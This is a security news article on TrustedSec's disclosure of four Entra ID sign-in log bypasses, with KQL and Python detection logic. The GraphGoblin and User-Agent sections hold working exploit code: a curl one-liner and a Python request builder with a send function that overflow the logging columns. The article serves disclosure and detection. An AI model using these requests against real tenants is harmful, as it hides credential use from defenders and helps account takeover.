
TrustedSec reveals four techniques for authenticating to Azure Entra ID without leaving a sign-in log entry

Ikesan

TrustedSec has disclosed four vulnerabilities that completely bypass the Azure Entra ID sign-in log. All four target the ROPC (Resource Owner Password Credentials) flow, and for the two that still issue valid tokens TrustedSec suspects the root cause is a column overflow in the SQL infrastructure that writes the logs on the Azure side.

The ROPC flow is an OAuth2 grant that obtains an access token by POSTing a username and password directly to the token endpoint; it is retained for compatibility with legacy systems. Although deprecated by modern security guidance, it is still frequently enabled in enterprise environments.

Four techniques

The four bypass techniques TrustedSec discovered between 2023 and 2025, in chronological order:

Name          Reported            Fixed               Valid token   Method
GraphNinja    August 2023         May 2024            No            Specify another tenant ID as the authentication endpoint
GraphGhost    December 2024       April 2025          No            Send invalid values for logon parameters so that post-authentication processing fails
GraphGoblin   September 26, 2025  November 21, 2025   Yes           Overflow the SQL column by repeating the scope parameter approximately 35,000 times
Graph******   September 28, 2025  October 8, 2025     Yes           Overflow the SQL column with a User-Agent header of more than 50,000 characters

GraphNinja and GraphGhost do not yield a token, whereas GraphGoblin and Graph****** return a valid access token while writing nothing to the sign-in log. The author deliberately withheld the name of the fourth technique: Microsoft fixed it before it was formally reported, so it never went through the normal disclosure process.

GraphGoblin technical details

CVSS v3.1: 7.5 (High); CVSS v4.0: 8.7. No CVE number has been disclosed.

flowchart TD
    A[Attacker] -->|ROPC POST<br/>scope repeated 35,000 times| B[login.microsoftonline.com]
    B --> C{Authentication}
    C -->|Authentication succeeds| D[Access token issued]
    C -->|Log write attempted| E[SQL column overflow]
    E -->|Write fails| F[Sign-in log: no record]
    D --> G[Attacker obtains token]
    F --> H[SOC/SIEM: no alert]

The attack can be reproduced with curl. The published one-liner showed only the oversized scope field; the standard ROPC form fields (grant_type, client_id, username, password) are included here so the request is complete.

curl -X POST "https://login.microsoftonline.com/${TENANT_ID}/oauth2/v2.0/token" \
  --data-urlencode "grant_type=password" --data-urlencode "client_id=${CLIENT_ID}" \
  --data-urlencode "username=${USERNAME}" --data-urlencode "password=${PASSWORD}" \
  --data-urlencode "scope=$(for num in {1..10000}; do echo -n 'openid '; done)"

Sending a scope value consisting of "openid " repeated roughly 10,000 to 35,000 times overflows the SQL column Azure uses to write the log record. Authentication itself completes and the token is returned, but the log-write phase fails, so nothing is left in the Entra ID sign-in log.

Graph****** method

This variant sends a User-Agent header of 50,000 characters or more. It targets the same ROPC endpoint and avoids the log write by overflowing the column that stores the User-Agent field. Microsoft fixed this issue before TrustedSec formally reported it, so it did not go through the bounty program's disclosure process.
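As an added example (not TrustedSec's or the article's own code), the following builds the full ROPC request for both overflow variants, so the whole form body is visible rather than only the scope field shown in the curl one-liner; it also serves as a concrete instance of the ROPC flow described earlier. The tenant, client and credential values are placeholders, the padding character for the User-Agent is an assumption (the article gives only the length), and nothing is sent unless you call send_ropc() yourself.

```python
"""Build the two log-evading ROPC requests described in the article.

Added example, not the article's or TrustedSec's code. Placeholder values
are assumptions; the request is only built, never sent, unless send_ropc()
is called explicitly.
"""
from urllib.parse import urlencode
import urllib.error
import urllib.request

TOKEN_URL = "https://login.microsoftonline.com/{tenant}/oauth2/v2.0/token"


def ropc_body(client_id, username, password, scope="openid"):
    """Standard ROPC form body for the v2.0 token endpoint: grant_type=password
    plus client_id, username, password and scope. The curl one-liner showed only scope."""
    return urlencode({
        "grant_type": "password",
        "client_id": client_id,
        "username": username,
        "password": password,
        "scope": scope,
    })


def ropc_request(tenant, client_id, username, password,
                 scope="openid", user_agent="ropc-example"):
    """An ordinary ROPC request: URL, headers and urlencoded body."""
    return {
        "url": TOKEN_URL.format(tenant=tenant),
        "headers": {
            "Content-Type": "application/x-www-form-urlencoded",
            "User-Agent": user_agent,
        },
        "body": ropc_body(client_id, username, password, scope),
    }


def graphgoblin_request(tenant, client_id, username, password, repeats=35000):
    """GraphGoblin: scope is 'openid' repeated ~35,000 times, space separated."""
    scope = " ".join(["openid"] * repeats)
    return ropc_request(tenant, client_id, username, password, scope=scope)


def long_user_agent_request(tenant, client_id, username, password, ua_len=50001):
    """Withheld-name variant: normal scope, but a User-Agent of 50,000+ characters.
    Filling it with 'A' is this example's assumption; the article gives only the length."""
    return ropc_request(tenant, client_id, username, password,
                        user_agent="A" * ua_len)


def send_ropc(req, timeout=30):
    """Perform a built request and return (HTTP status, response body).
    Requires network access; not called by anything else in this file."""
    http_req = urllib.request.Request(
        req["url"], data=req["body"].encode(), headers=req["headers"], method="POST")
    try:
        with urllib.request.urlopen(http_req, timeout=timeout) as resp:
            return resp.status, resp.read().decode()
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode()


if __name__ == "__main__":
    req = graphgoblin_request("TENANT_ID", "CLIENT_ID", "user@example.com", "password")
    print(req["url"], len(req["body"]), "bytes of form body")
    req = long_user_agent_request("TENANT_ID", "CLIENT_ID", "user@example.com", "password")
    print(req["url"], len(req["headers"]["User-Agent"]), "byte User-Agent")
```

The body is urlencoded with urlencode(), so the spaces between the repeated "openid" values travel as "+", which the token endpoint decodes the same way as the "%20" curl emits.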

Detection method

Because these sign-ins never reach the normal sign-in log, detection relies on Microsoft Graph Activity Logs, which the article notes require a Microsoft E5 license. The KQL query published by TrustedSec performs a left anti-join of Graph Activity Logs against the union of all sign-in log tables, returning token usage for which no corresponding sign-in record exists.

MicrosoftGraphActivityLogs
| where TimeGenerated > ago(8d)          // Graph calls made with a token in the last 8 days
| join kind=leftanti (union isfuzzy=true // leftanti: keep Graph rows with no matching sign-in
    SigninLogs,
    AADNonInteractiveUserSignInLogs,
    AADServicePrincipalSignInLogs,
    AADManagedIdentitySignInLogs,
    MicrosoftServicePrincipalSignInLogs
    | where TimeGenerated > ago(90d)     // longer lookback: the token may have been issued earlier
    | summarize arg_max(TimeGenerated, *) by UniqueTokenIdentifier   // one row per token
)
on $left.SignInActivityId == $right.UniqueTokenIdentifier

The join key is SignInActivityId on the Graph Activity Logs side and UniqueTokenIdentifier on the sign-in log side; kind=leftanti keeps only the Graph rows with no match, so every row returned is a token that was used against Graph without a corresponding sign-in record, which is the signature of a bypass. The windows are deliberately asymmetric: the sign-in side looks back 90 days so that a token issued before the 8-day Graph window still finds its sign-in entry and is not reported as a false positive.
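To make the join logic concrete, here is the same left anti-join expressed in plain Python over a handful of constructed log rows. This is an added example, not TrustedSec's published query; the column names mirror the Log Analytics tables, but the rows are constructed for this example and are not real telemetry.

```python
"""The TrustedSec KQL detection expressed in Python over constructed rows.

Added example, not TrustedSec's query. Column names follow the Log Analytics
tables (SignInActivityId on MicrosoftGraphActivityLogs, UniqueTokenIdentifier
on the sign-in tables); the rows below are constructed sample data.
"""
from datetime import datetime, timedelta, timezone

# Fixed reference time so the example is deterministic; stands in for now().
NOW = datetime(2025, 11, 1, tzinfo=timezone.utc)


def ago(**delta):
    """KQL-style ago(): a timestamp the given interval before NOW."""
    return NOW - timedelta(**delta)


# Constructed MicrosoftGraphActivityLogs rows (subset of columns).
GRAPH_ACTIVITY = [
    {"TimeGenerated": ago(hours=1), "SignInActivityId": "tok-1111", "UserId": "u1",
     "RequestUri": "https://graph.microsoft.com/v1.0/me"},
    {"TimeGenerated": ago(hours=2), "SignInActivityId": "tok-2222", "UserId": "u2",
     "RequestUri": "https://graph.microsoft.com/v1.0/users"},
    {"TimeGenerated": ago(days=9), "SignInActivityId": "tok-3333", "UserId": "u3",
     "RequestUri": "https://graph.microsoft.com/v1.0/me"},            # outside the 8d window
    {"TimeGenerated": ago(hours=3), "SignInActivityId": "tok-4444", "UserId": "u4",
     "RequestUri": "https://graph.microsoft.com/v1.0/me/messages"},   # no sign-in row exists
]

# Constructed rows as the union of the sign-in tables would yield them.
SIGNIN_UNION = [
    {"TimeGenerated": ago(hours=1, minutes=5), "UniqueTokenIdentifier": "tok-1111",
     "Table": "SigninLogs"},
    {"TimeGenerated": ago(hours=1, minutes=4), "UniqueTokenIdentifier": "tok-1111",
     "Table": "AADNonInteractiveUserSignInLogs"},   # duplicate key: arg_max keeps the newest
    {"TimeGenerated": ago(hours=2, minutes=1), "UniqueTokenIdentifier": "tok-2222",
     "Table": "AADNonInteractiveUserSignInLogs"},
    {"TimeGenerated": ago(days=9, minutes=2), "UniqueTokenIdentifier": "tok-3333",
     "Table": "SigninLogs"},
    # tok-4444 deliberately has no sign-in row: the state a log bypass leaves behind.
]


def latest_signin_by_token(signin_rows, now=NOW, window=timedelta(days=90)):
    """union ... | where TimeGenerated > ago(90d)
               | summarize arg_max(TimeGenerated, *) by UniqueTokenIdentifier"""
    latest = {}
    for row in signin_rows:
        if row["TimeGenerated"] <= now - window:
            continue
        key = row["UniqueTokenIdentifier"]
        if key not in latest or row["TimeGenerated"] > latest[key]["TimeGenerated"]:
            latest[key] = row
    return latest


def find_unlogged_token_use(graph_rows, signin_rows, now=NOW,
                            graph_window=timedelta(days=8)):
    """MicrosoftGraphActivityLogs | where TimeGenerated > ago(8d)
       | join kind=leftanti (...) on SignInActivityId == UniqueTokenIdentifier"""
    known = latest_signin_by_token(signin_rows, now)
    return [
        g for g in graph_rows
        if g["TimeGenerated"] > now - graph_window
        and g["SignInActivityId"] not in known
    ]


if __name__ == "__main__":
    for hit in find_unlogged_token_use(GRAPH_ACTIVITY, SIGNIN_UNION):
        print(f"token {hit['SignInActivityId']} used by {hit['UserId']} at "
              f"{hit['TimeGenerated']:%Y-%m-%d %H:%M} with no sign-in record")
```

Running it reports only tok-4444: tok-1111 and tok-2222 have sign-in rows, and tok-3333's Graph activity is older than the 8-day window. The 90-day lookback on the sign-in side matters: a sign-in that has aged out of that window no longer clears the token, so a token still in use that was issued more than 90 days earlier would surface as well and needs to be read with that in mind.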

Microsoft response and issues

Even though GraphGoblin issues valid tokens and leaves no log entry, Microsoft classified it as "Moderate" severity and excluded it from the bounty program. TrustedSec disagrees with that decision, calling the risk significant because it cripples intrusion detection for thousands of organizations.

All four have been fixed, but it would not be surprising if similar techniques still exist. For now the only countermeasures available are disabling the ROPC flow wherever possible and setting up Graph Activity Logs monitoring in an E5 environment.